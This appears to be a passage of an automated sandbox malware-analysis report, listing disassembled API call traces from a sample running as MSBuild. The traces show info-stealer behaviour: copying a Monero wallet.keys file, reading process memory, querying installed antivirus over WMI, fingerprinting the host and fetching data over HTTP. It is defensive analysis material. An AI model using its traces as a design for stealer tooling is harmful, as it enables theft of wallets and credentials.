• lstrcat.KERNEL32(000000FF,00426C90), ref: 00409B8A
• lstrlen.KERNEL32(000000FF), ref: 00409C00
• lstrlen.KERNEL32(000000FF), ref: 00409C0F
• memset.MSVCRT ref: 00409C65
  • Part of subcall function 00410090: StrCmpCA.SHLWAPI(?,00000000,?,00407476,00E398A0,?,00000000,?), ref: 0041009A
                                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 00409C8D
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1973479514-0
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 00404482
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405AF8
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00E39A60,?,?,?,?,?,?,00000004), ref: 00405B10
                                                                                                                                                                                                                                                                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B34
                                                                                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,GET,?,00E39E50,00000000,00000000,-00400100,00000000), ref: 00405B6B
                                                                                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405B8F
                                                                                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00405B9A
                                                                                                                                                                                                                                                                            • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00405BB8
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,000007CF,00420039), ref: 00405C05
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,00E2E4B0,?), ref: 0041001C
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,000007CF,00420039), ref: 00405C5B
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00405C66
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00405C70
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00405C7A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequestlstrlen$ConnectCrackInfoOptionQuerySendlstrcat
                                                                                                                                                                                                                                                                            • String ID: ERROR$ERROR$GET$;A$;A
                                                                                                                                                                                                                                                                            • API String ID: 1851261701-2536196751
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00401D74
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401D8A
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401D91
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,004021A1), ref: 00401DAE
                                                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(004021A1,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401DC8
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 004153E0: Sleep.KERNEL32(000003E8,00422591,PdA,?,?,?,00000001), ref: 004154A5
                                                                                                                                                                                                                                                                              • Part of subcall function 004153E0: CreateThread.KERNEL32(00000000,00000000,00413E10,?,00000000,00000000), ref: 004154C6
                                                                                                                                                                                                                                                                              • Part of subcall function 004153E0: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004154D2
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(004021A1), ref: 00401DD2
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,00000000), ref: 00401DE0
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 00401DED
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(?,.keys), ref: 00401E08
                                                                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401EF5
                                                                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(00000000), ref: 00401F6F
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00401F8D
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileHeaplstrcatmemset$AllocCloseCopyCreateDeleteObjectOpenProcessQuerySingleSleepThreadValueWaitlstrcpylstrlen
                                                                                                                                                                                                                                                                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                                                                                                                                                                                                                                            • API String ID: 862308015-218353709
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 00412396
                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 00412423
                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 00412460
                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 004124A9
                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 004124F2
                                                                                                                                                                                                                                                                            • lstrcpy.KERNEL32(?,00000000), ref: 0041253A
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,true,?), ref: 004126C5
                                                                                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 00412752
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: lstrcpy$strtok_s
                                                                                                                                                                                                                                                                            • String ID: false$true
                                                                                                                                                                                                                                                                            • API String ID: 2610293679-2658103896
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(00000000,00E367A0,00000000,00020019,00000000,004270A7,?,00000001), ref: 0041085F
                                                                                                                                                                                                                                                                            • RegEnumKeyExA.KERNEL32(00000000,?,?,0042750C,00000000,00000000,00000000,00000000,?,?,00000001), ref: 004108BE
                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 004108E7
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,?), ref: 00410905
                                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,00E39DF0,00000000,000F003F,?,00000400), ref: 00410935
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(?), ref: 0041094A
                                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,00E39D30,00000000,000F003F,?,00000400,00000000,004219B1,?,00000000,?,004270D8), ref: 004109CE
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: OpenQueryValuelstrcpy$Enumlstrlenwsprintf
                                                                                                                                                                                                                                                                            • String ID: - $%s\%s$?
                                                                                                                                                                                                                                                                            • API String ID: 1989970852-3278919252
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 00404482
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                                                              • Part of subcall function 00404430: InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,05F5E0FF,?,?,?,?,?,?,00000000), ref: 00404C5B
                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,?,00000000), ref: 00404C62
                                                                                                                                                                                                                                                                            • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404C80
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00E39A60,?,?,?,?,?,?,00000000), ref: 00404C96
                                                                                                                                                                                                                                                                            • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404CC1
                                                                                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,GET,?,00E39E50,00000000,00000000,-00400100,00000000), ref: 00404CFB
                                                                                                                                                                                                                                                                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404D20
                                                                                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404D32
                                                                                                                                                                                                                                                                            • HttpQueryInfoA.WININET(000000FF,00000013,?,?,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(000000FF,?,00000400,00000001), ref: 00404DC4
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00404DF5
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00404DFF
                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00404E09
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                                                                                                                            • String ID: GET
                                                                                                                                                                                                                                                                            • API String ID: 442264750-1805413626
                                                                                                                                                                                                                                                                            • Opcode ID: c8598b76782b08933c13cff9c97261692f6bb3eeeac1fb73a4ca9257dacd5c94
                                                                                                                                                                                                                                                                            • Instruction ID: d281c038e4fc1d43085ff1e335aac5a1d2015f5d0f0e8fc3e36784ae5f7bfe4e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8598b76782b08933c13cff9c97261692f6bb3eeeac1fb73a4ca9257dacd5c94
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF6164B5A00219ABEB20DBA4DC45FEFB7B9EB49710F104129FA15F72C0D7789904CBA5
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ??_U@YAPAXI@Z.MSVCRT ref: 0040FB4B
                                                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000000), ref: 0040FB73
                                                                                                                                                                                                                                                                            • strlen.MSVCRT ref: 0040FB94
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040FBD0
                                                                                                                                                                                                                                                                            • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000208,00000000), ref: 0040FC2B
                                                                                                                                                                                                                                                                            • strlen.MSVCRT ref: 0040FC38
                                                                                                                                                                                                                                                                            • strlen.MSVCRT ref: 0040FC7E
                                                                                                                                                                                                                                                                            • memset.MSVCRT ref: 0040FCCA
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040FBE6, 0040FCE3
                                                                                                                                                                                                                                                                            • N0ZWFt, xrefs: 0040FC79, 0040FC89
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: strlen$Processmemset$MemoryOpenRead
                                                                                                                                                                                                                                                                            • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                                                                                                                                                                                                                                                            • API String ID: 47329967-1622206642
                                                                                                                                                                                                                                                                            • Opcode ID: 8515397436616f86fadcf9a59e55485939000e9b722e0d944461951cf1175df8
                                                                                                                                                                                                                                                                            • Instruction ID: 20f69977443de8948ddffc0f4a3381c49359371f896369b3d50972fa4481eb24
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8515397436616f86fadcf9a59e55485939000e9b722e0d944461951cf1175df8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80612571D00208ABEB309B91DC45BEFB678AF84714F14413EF915B76C1D7BC598887A9
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000000,?,00000000,?,AV: ,00000000,?,00427418,00000000,?,00000000,00000000), ref: 00411203
                                                                                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427418), ref: 00411214
                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(00427D04,00000000,00000001,00427C34,?,?,00000000,?,AV: ,00000000,?,00427418,00000000,?,00000000,00000000), ref: 0041122E
                                                                                                                                                                                                                                                                            • CoSetProxyBlanket.OLE32(00427418,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000,?,AV: ,00000000,?,00427418,00000000), ref: 00411267
                                                                                                                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004112C2
                                                                                                                                                                                                                                                                              • Part of subcall function 004115F0: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,004112EB,?,?,00000000,?,AV: ,00000000,?,00427418,00000000,?,00000000), ref: 004115F8
                                                                                                                                                                                                                                                                              • Part of subcall function 004115F0: CharToOemW.USER32(?,00000000), ref: 00411605
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004112FD
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000511000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000514000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000051A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.0000000000558000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.00000000005F1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2133073666.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: InitializeVariant$AllocBlanketCharClearCreateInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                                                                                                            • String ID: Select * From AntiVirusProduct$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                                                                                                                            • API String ID: 685420537-2776955613
                                                                                                                                                                                                                                                                            • Opcode ID: 5fbc72881901a930d909b08e693eb3415aed348d33cd1dd08cc58bbd85476723
                                                                                                                                                                                                                                                                            • Instruction ID: 771bfa06b1ee6aab49511a194e20b68bd9ee86493e24a2358091a886c33ff084
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5fbc72881901a930d909b08e693eb3415aed348d33cd1dd08cc58bbd85476723
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F1415A71B01229ABCB24DB95DC45EEFBB78EF49B50F10411AF615A7290C678AA01CBE4
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                              • Part of subcall function 00405A80: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405AF8
                                                                                                                                                                                                                                                                              • Part of subcall function 00405A80: StrCmpCA.SHLWAPI(?,00E39A60,?,?,?,?,?,?,00000004), ref: 00405B10
                                                                                                                                                                                                                                                                              • Part of subcall function 00405A80: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B34
                                                                                                                                                                                                                                                                              • Part of subcall function 00405A80: HttpOpenRequestA.WININET(00000000,GET,?,00E39E50,00000000,00000000,-00400100,00000000), ref: 00405B6B
                                                                                                                                                                                                                                                                              • Part of subcall function 00405A80: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405B8F
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413C14
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00422019), ref: 00413C2B
                                                                                                                                                                                                                                                                              • Part of subcall function 004116D0: LocalAlloc.KERNEL32(00000040,?,?,00000001,00000004,?,00413C40,00000000,00000000), ref: 004116EC
                                                                                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000000,00000000), ref: 00413C57
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00413C6C
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00413C89
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Internetlstrcpylstrlen$Open$AllocConnectHttpLocalOptionRequest
                                                                                                                                                                                                                                                                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                                                                                                                            • API String ID: 2440237315-1526165396
                                                                                                                                                                                                                                                                            • Opcode ID: 6d3e98a88f886c359271a77fae815b0e1c5059f1360d4e4e151493efacfc2543
                                                                                                                                                                                                                                                                            • Instruction ID: c127ad534209f32346ea4566e2f3d6fae2444d447a8e8f5fff74df097b54c808
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6d3e98a88f886c359271a77fae815b0e1c5059f1360d4e4e151493efacfc2543
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F151C330901258DACB10EBA5C9117DDBBA5AF19308F5000BEE905732D2DB7C6F08C7EA
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00410D68
                                                                                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(00421A29,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410DA1
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00410DED
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00410DF4
                                                                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00410E31
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,00427080), ref: 00410E40
                                                                                                                                                                                                                                                                              • Part of subcall function 00410CD0: GetCurrentHwProfileA.ADVAPI32(?), ref: 00410CE5
                                                                                                                                                                                                                                                                            • lstrlen.KERNEL32(00000000), ref: 00410E62
                                                                                                                                                                                                                                                                              • Part of subcall function 00411B50: malloc.MSVCRT ref: 00411B61
                                                                                                                                                                                                                                                                              • Part of subcall function 00411B50: strncpy.MSVCRT ref: 00411B71
                                                                                                                                                                                                                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 00410E90
                                                                                                                                                                                                                                                                              • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2133073666.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
